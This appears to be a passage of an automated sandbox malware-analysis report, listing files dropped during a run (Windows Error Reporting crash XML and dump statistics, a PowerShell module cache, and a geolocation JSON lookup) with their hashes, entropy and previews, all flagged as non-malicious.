                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306646" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8250
                                                    Entropy (8bit):3.6748210069429716
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJtX6HV6YWs6HygmfUlpxj89bnysf0xuNm:R6lXJ96HV6YV6SgmfUOnxf2
                                                    MD5:EF84164063E4A443360B9597F1FFA9ED
                                                    SHA1:8562B5FBA5A349645DBD851AB6362A8C78629352
                                                    SHA-256:A9C16EA35687403F91C243EFB420DFA54D161AEC2C7004DB22E75CFE65FDD270
                                                    SHA-512:2970E3F93A2991AA04372D9EE148E738E5C3C26F053DF26F567062E5B17E2F4D7D0BA1CA346DC8559E337642AA52D151F57E54DA031AC5C66C4E4E3478B005EB
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.3.2.<./.P.i.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8250
                                                    Entropy (8bit):3.6754847680072107
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJXI6e6YWV6HygmfUlpxT89bnqsfD8Nm:R6lXJ46e6Ys6SgmfU+nJfv
                                                    MD5:B09E4CFA9F1EE4457B2C5626A53026C7
                                                    SHA1:04C0689ECF122AE68DE2F0A380DAACDE6CBAE909
                                                    SHA-256:AC1357F0C064DFEFC62611ABF930B338DECE7C4E2D6403C9542941708E0B3315
                                                    SHA-512:4CAB2AF1D7C6EA443435E3D23406F5607093B9948EDFEA41088A106B5FD437A4C9CC3C3E0A53B53864E767906D4EE1052065DC462396F4732321E01E03550BF5
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.3.2.<./.P.i.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4564
                                                    Entropy (8bit):4.425998232024977
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsEJg77aI9+ZWpW8VY8KYm8M4JTHF+m+q8797I3dBmd:uIjfCI7Eo7VVjJQmwk3dBmd
                                                    MD5:BDAD1F361E9050B5274A8D6326669A81
                                                    SHA1:E701A5277E005F900BE075ACBCD24A88F2BDEB1B
                                                    SHA-256:7ED6B1A0E8D0DDBB0E607094B1D9C0AEE1F7345E049000D79B47D5759098FD56
                                                    SHA-512:2E576E506CC865A6B1B11FF6ADB5129EB323AF1B04A41E13CFC059B52E8044FB2FC773A452E530571C2D8BD7E7FDECC378E4A1BBD5357515FAAF315D412ABAD0
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306647" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8250
                                                    Entropy (8bit):3.6753653664047388
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJ6ul6F6YW46rgmfUlpxO89bnxsfyNm:R6lXJ/6F6YR6rgmfUNnqfB
                                                    MD5:37803F9E327F95B86F64F3DEB6439220
                                                    SHA1:596C4CA927317C77D57BFACFF0BCF6A3810CDC2B
                                                    SHA-256:B2CBF941D8F17CA5AA7D9D4738072A9253C73509E05ADB63DEB977FAC31DC957
                                                    SHA-512:D94D67929F4477ED81D637F0DEEE429BC4814D3CA28D92EBA5CB898C512D32305E474A845697C863DE0E32DCB1681B1C084E1D1C76FEBB0E7980408B948D0172
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.2.8.<./.P.i.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4564
                                                    Entropy (8bit):4.424059776003986
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsEJg77aI9+ZWpW8VY8RYm8M4JTHFLj+q87G7I3dBQd:uIjfCI7Eo7VVQJl/k3dBQd
                                                    MD5:7DE815801FFCBCF51329E071A28F9449
                                                    SHA1:E92D10AE1C56F4B655749FB3458B7AE6111D2574
                                                    SHA-256:3A32CCF6474D0A48CCD1FA5F6A3149038DE6AB308C896AB495966F8BD9324C8C
                                                    SHA-512:83B4EB8A0C33D57FDF864ABD2E683A4C1E0AB372035012F1993B26A9C975318DA11EDA0B97D043A42136EA71C357BF79DF4FE07A0997400C208EC54A91F63B8A
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306647" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4564
                                                    Entropy (8bit):4.425902216494177
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zsEJg77aI9+ZWpW8VY8dYm8M4JTHFB+q87Czf7I3dB4d:uIjfCI7Eo7VV8J3fk3dB4d
                                                    MD5:282C1B136D02B311084306B7C26123F2
                                                    SHA1:05BEF2455C91FF9156710FB461E0D15AB3541C88
                                                    SHA-256:52504B75F06690AE93581BC7DBF0E606BCB9E0A746A41F97ACC5A434BA5E67A6
                                                    SHA-512:10FD9364CD62978D43EEC7817DB513C7A8508CAA023C55BDE5EE2376B8CF5715B08E44C3F377BAF0AB80EE92108E888B1725A479DB1CC1FEE0DB10E92655BEDD
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="306647" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):965
                                                    Entropy (8bit):5.023161606859709
                                                    Encrypted:false
                                                    SSDEEP:12:tkeknd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7Pp:qPdVauKyGX85jvXhNlT3/7AcV9Wro
                                                    MD5:213C021986665186ADF388537CF7904A
                                                    SHA1:AC939D70CA45E2BC2643EC9C2B491E39AFFD7B1A
                                                    SHA-256:59379A6DB89949B709D13D99B13CE3F5B9B9F3064198304C6DB83D3503A46825
                                                    SHA-512:07DE974A4EA0E3F0684165D0184C14801B02DA4541A244262107E33B4B2FFE7FE34924171CEB8126357E1DE15064EE43D7737C58E6A5B4188CECF3A0AEA1E68B
                                                    Malicious:false
                                                    Preview:{. "geoplugin_request":"191.96.227.219",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):8003
                                                    Entropy (8bit):4.838950934453595
                                                    Encrypted:false
                                                    SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                    MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                    SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                    SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                    SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                    Malicious:false
                                                    Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4736
                                                    Entropy (8bit):3.2401518799586975
                                                    Encrypted:false
                                                    SSDEEP:96:pwpIitkXkkXfkuguWn0Q90QP0Qgr0QXQ0Q50Q9k2gWXGOszeuzSzbxGQI58mXspc:pgle+uxduoeyOkNP
                                                    MD5:B1890ACCF8B78F59FB6686992860E020
                                                    SHA1:64F2C22C4FA5A1042123D1D9D1D8F4364F2BCEA0
                                                    SHA-256:D7EBF7B9C8520D8E97D7812C6DD59196A7155D4332E1B7EC2074CE42BF9B24C7
                                                    SHA-512:1C36CB9E71B507344EF11CFB5F4D8E31B11646A046C6BFA38D2109520A92BCEE062E56C5ECC1368B9EC5DE3EA4B3480BC849FC9B2D0BD81E6DBCBB7F760387B1
                                                    Malicious:false
                                                    Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.9.2.7.9.5.8. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4742
                                                    Entropy (8bit):3.241392133368642
                                                    Encrypted:false
                                                    SSDEEP:96:pwpIitkXkkXfkuguWf0QR0Qx0Qg80QXX0QzE0QlJNgMXnRszeuzSzbxGQI5UhmA+:pgle+urkWoeyOkNKQ
                                                    MD5:106BA1D086DF853C3B0EE73BE948DC30
                                                    SHA1:B4A881446F15E8CC9B7BE9A66413185AB2F39DFB
                                                    SHA-256:7CB217137D4DB9B1AE6C6EA0161B28C3D9ACB1E7BCDCBB5EF407BFA237DCB196
                                                    SHA-512:50D103BDB7BBF70AFD5CFD3E46517C9371467294AD64254346F9F482366DE50C38AB55A060A948AA11F75070C99635AFCDCF44805E3396C42D0097B35522FA43
                                                    Malicious:false
                                                    Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .4.1.6.5.9.2.7. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4736
                                                    Entropy (8bit):3.2411815368119576
                                                    Encrypted:false
                                                    SSDEEP:96:pwpIitkXkkXfkuguWC0QL0QU0Qgv0QXW0Q+0Qb4CSgWXzCszeuzSzbxGQI5Uhmp+:pgle+uxz/oeyOkNKZ
                                                    MD5:06B054049B03CCBD594BDB27A39481C7
                                                    SHA1:6825F2B62075CB830D7ADBE97ACD9E99683E5CAA
                                                    SHA-256:395E982C7101EDB1CC2C3F22DBB7E1A71CCC18BFF19B3780FA54194A2C04F239
                                                    SHA-512:BAAC0EDE6F5FB9B4B125F6F764DCFC9AAA384947E4CB5F0D735BB06C95C65C9F78AA05F28E222D5C39B2C6A553AB79876330D061C6C3D9B3EFB0FDB9AB5553E0
                                                    Malicious:false
                                                    Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.9.5.6.8.0.7. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4734
                                                    Entropy (8bit):3.238231103564202
                                                    Encrypted:false
                                                    SSDEEP:96:pwpIitkXkkXfkuguWw0Qip0QO0QgC0QX90Qz0QhSNHgUX/zszeuzSzbxGQI5zmF+:pgle+uGe4oeyOkNZ
                                                    MD5:9D707584C1393FA7BF428ECAE29F9349
                                                    SHA1:396BD213B85706F8A451F9C183A8854325608B21
                                                    SHA-256:CE097925E96BB799870A09FDC78E8063BFCEEDD1668B314EFA5A8945F48A544B
                                                    SHA-512:5EAAF7CA979BC062CB7ABD5AF746229529DEA0FF8C77515888E8DB2E69B74EC69864B69850C4885A8D36A82AAAC8F66ADBF33ED537AA253AC704915F3F4FB6F1
                                                    Malicious:false
                                                    Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.2.8. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.8.6.5.2.1.7. .c.y.c.l.e.s.......-. .V.a.C.l.o.n.e.C.y.c.l.e.C.o.u.n.t. . . . . . . . .:.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4748
                                                    Entropy (8bit):3.242496238629837
                                                    Encrypted:false
                                                    SSDEEP:96:pwpIiekXkkXfkuguWO0Qc0QY0Qgwv0QX70QK0QAYhg0XPrPszeuzSzbxGQI5UhmA:pzle+uMaIoeyOkNKl
                                                    MD5:D09C10E7934A4E87C5B8CEF1C9A1B574
                                                    SHA1:7D07194DE1CC347FFF142CEF2993B5F8B03280CF
                                                    SHA-256:8E676D0E80467D8C10FF8D51656184AD6CE7103A9447057C665461A8E054F880
                                                    SHA-512:47BC969C64C9DCC68F787D51A26F6AB2AFA80E8196D3A51D07B5803923AB3CCC63D4F4D3992F8F0094839F5210CD9792EA46B9368AC58A1B63E20BA0B941B113
                                                    Malicious:false
                                                    Preview:......S.n.a.p.s.h.o.t. .s.t.a.t.i.s.t.i.c.s.:.....-. .S.i.g.n.a.t.u.r.e. . . . . . . . . . . . . . . . .:. .P.S.S.D.......-. .F.l.a.g.s./.C.a.p.t.u.r.e.F.l.a.g.s. . . . . . . .:. .0.0.0.0.0.0.0.1./.d.0.0.0.3.9.f.f.......-. .A.u.x. .p.a.g.e.s. . . . . . . . . . . . . . . . .:. .1. .e.n.t.r.i.e.s. .l.o.n.g.......-. .V.A. .s.p.a.c.e. .s.t.r.e.a.m. . . . . . . . . . .:. .2.9.7.6. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .t.r.a.c.e. .s.t.r.e.a.m. . . . . . .:. .0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .H.a.n.d.l.e. .s.t.r.e.a.m. . . . . . . . . . . . .:. .6.4.0. .b.y.t.e.s. .i.n. .s.i.z.e.......-. .T.h.r.e.a.d.s. . . . . . . . . . . . . . . . . . .:. .1. .t.h.r.e.a.d.s.......-. .T.h.r.e.a.d. .s.t.r.e.a.m. . . . . . . . . . . . .:. .8.3.2. .b.y.t.e.s. .i.n. .s.i.z.e...........S.n.a.p.s.h.o.t. .p.e.r.f.o.r.m.a.n.c.e. .c.o.u.n.t.e.r.s.:.....-. .T.o.t.a.l.C.y.c.l.e.C.o.u.n.t. . . . . . . . . . .:. .2.9.6.1.2.1.4. .c.y.c.l.e.s.......-. 